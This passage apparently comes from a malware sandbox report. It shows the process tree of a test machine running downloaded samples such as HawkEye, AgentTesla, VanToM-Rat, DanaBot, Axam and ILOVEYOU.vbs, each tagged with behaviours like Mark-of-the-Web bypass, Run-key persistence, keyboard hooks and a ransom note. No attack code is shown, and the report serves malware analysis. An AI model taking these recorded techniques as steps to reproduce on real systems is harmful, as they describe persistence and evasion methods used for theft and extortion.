                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1324
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6320 /prefetch:2
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2368
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
                                              2⤵
                                                PID:1912
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6852 /prefetch:8
                                                2⤵
                                                  PID:3428
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6588 /prefetch:8
                                                  2⤵
                                                  • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                  • NTFS ADS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1848
                                                • C:\Users\Admin\Downloads\HawkEye.exe
                                                  "C:\Users\Admin\Downloads\HawkEye.exe"
                                                  2⤵
                                                  • Chimera
                                                  • Executes dropped EXE
                                                  • Drops desktop.ini file(s)
                                                  • Drops file in Program Files directory
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2216
                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                    "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Music\YOUR_FILES_ARE_ENCRYPTED.HTML"
                                                    3⤵
                                                    • Modifies Internet Explorer settings
                                                    PID:996
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
                                                  2⤵
                                                    PID:1524
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4056 /prefetch:8
                                                    2⤵
                                                      PID:3540
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
                                                      2⤵
                                                        PID:2492
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6784 /prefetch:8
                                                        2⤵
                                                        • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                        • NTFS ADS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1248
                                                      • C:\Users\Admin\Downloads\AgentTesla.exe
                                                        "C:\Users\Admin\Downloads\AgentTesla.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:8
                                                      • C:\Users\Admin\Downloads\AgentTesla.exe
                                                        "C:\Users\Admin\Downloads\AgentTesla.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:3152
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
                                                        2⤵
                                                          PID:2436
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6904 /prefetch:8
                                                          2⤵
                                                          • NTFS ADS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1252
                                                        • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                          "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • NTFS ADS
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:1640
                                                          • C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe
                                                            "C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4748
                                                        • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                          "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4524
                                                        • C:\Users\Admin\Downloads\VanToM-Rat.bat
                                                          "C:\Users\Admin\Downloads\VanToM-Rat.bat"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                          PID:1428
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
                                                          2⤵
                                                            PID:3340
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6296 /prefetch:8
                                                            2⤵
                                                              PID:1988
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:8
                                                              2⤵
                                                              • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                              • NTFS ADS
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:3604
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
                                                              2⤵
                                                                PID:4060
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6888 /prefetch:8
                                                                2⤵
                                                                  PID:4992
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
                                                                  2⤵
                                                                  • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                  • NTFS ADS
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3780
                                                                • C:\Users\Admin\Downloads\Silver.exe
                                                                  "C:\Users\Admin\Downloads\Silver.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • Enumerates connected drives
                                                                  • Drops file in Windows directory
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies registry class
                                                                  • NTFS ADS
                                                                  PID:4776
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
                                                                  2⤵
                                                                    PID:3600
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7188 /prefetch:8
                                                                    2⤵
                                                                      PID:2004
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6500 /prefetch:8
                                                                      2⤵
                                                                      • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                      • NTFS ADS
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:3460
                                                                    • C:\Users\Admin\Downloads\DanaBot.exe
                                                                      "C:\Users\Admin\Downloads\DanaBot.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2892
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 300
                                                                        3⤵
                                                                        • Program crash
                                                                        PID:3088
                                                                    • C:\Users\Admin\Downloads\DanaBot.exe
                                                                      "C:\Users\Admin\Downloads\DanaBot.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:5032
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 260
                                                                        3⤵
                                                                        • Program crash
                                                                        PID:740
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
                                                                      2⤵
                                                                        PID:5024
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7176 /prefetch:8
                                                                        2⤵
                                                                        • NTFS ADS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3192
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
                                                                        2⤵
                                                                          PID:3644
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6844 /prefetch:8
                                                                          2⤵
                                                                            PID:1216
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:8
                                                                            2⤵
                                                                            • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                            • NTFS ADS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3136
                                                                          • C:\Users\Admin\Downloads\Funsoul.exe
                                                                            "C:\Users\Admin\Downloads\Funsoul.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1056
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                                                                            2⤵
                                                                              PID:568
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7256 /prefetch:8
                                                                              2⤵
                                                                              • NTFS ADS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1036
                                                                            • C:\Windows\silver.vxd
                                                                              "C:\Windows\silver.vxd" 365157 "C:\Users\Admin\DOWNLO~1\ILOVEYOU.vbs"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Enumerates connected drives
                                                                              • Drops file in Windows directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • NTFS ADS
                                                                              PID:1776
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\\System32\WScript.exe" "C:\Users\Admin\DOWNLO~1\ILOVEYOU.vbs"
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4964
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
                                                                              2⤵
                                                                                PID:3128
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5956 /prefetch:8
                                                                                2⤵
                                                                                  PID:2352
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 /prefetch:8
                                                                                  2⤵
                                                                                  • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                  • NTFS ADS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:3192
                                                                                • C:\Users\Admin\Downloads\Axam.a.exe
                                                                                  "C:\Users\Admin\Downloads\Axam.a.exe"
                                                                                  2⤵
                                                                                  • Drops startup file
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:1996
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7236 /prefetch:1
                                                                                  2⤵
                                                                                    PID:4264
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
                                                                                    2⤵
                                                                                      PID:1832
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                                      2⤵
                                                                                        PID:2816
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
                                                                                        2⤵
                                                                                          PID:1304
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
                                                                                          2⤵
                                                                                            PID:484
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
                                                                                            2⤵
                                                                                              PID:1884
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
                                                                                              2⤵
                                                                                                PID:32
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:976
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7680 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4876
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7528 /prefetch:8
                                                                                                    2⤵
                                                                                                    • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                                    • NTFS ADS
                                                                                                    PID:648
                                                                                                  • C:\Users\Admin\AppData\Roaming\Axam.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\Memz Clean.exe"
                                                                                                    2⤵
                                                                                                    • Drops startup file
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:972
                                                                                                  • C:\Users\Admin\AppData\Roaming\Axam.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\Memz Clean.exe"
                                                                                                    2⤵
                                                                                                    • Drops startup file
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:3012
                                                                                                  • C:\Users\Admin\AppData\Roaming\Axam.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Axam.exe" "C:\Users\Admin\Downloads\Adwind.exe"
                                                                                                    2⤵
                                                                                                    • Drops startup file
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Modifies registry class
                                                                                                    PID:4728
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:4460
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:4264
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8004 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:1604
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7884 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:3636
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:2860
                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:1316
                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                              1⤵
                                                                                                                PID:3040
                                                                                                              • C:\Users\Admin\Downloads\HawkEye.exe
                                                                                                                "C:\Users\Admin\Downloads\HawkEye.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1804
                                                                                                              • C:\Users\Admin\Downloads\HawkEye.exe
                                                                                                                "C:\Users\Admin\Downloads\HawkEye.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4056
                                                                                                              • C:\Users\Admin\Downloads\AgentTesla.exe
                                                                                                                "C:\Users\Admin\Downloads\AgentTesla.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:2772
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2892 -ip 2892
                                                                                                                1⤵
                                                                                                                  PID:3636
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5032 -ip 5032
                                                                                                                  1⤵
                                                                                                                    PID:1200
                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
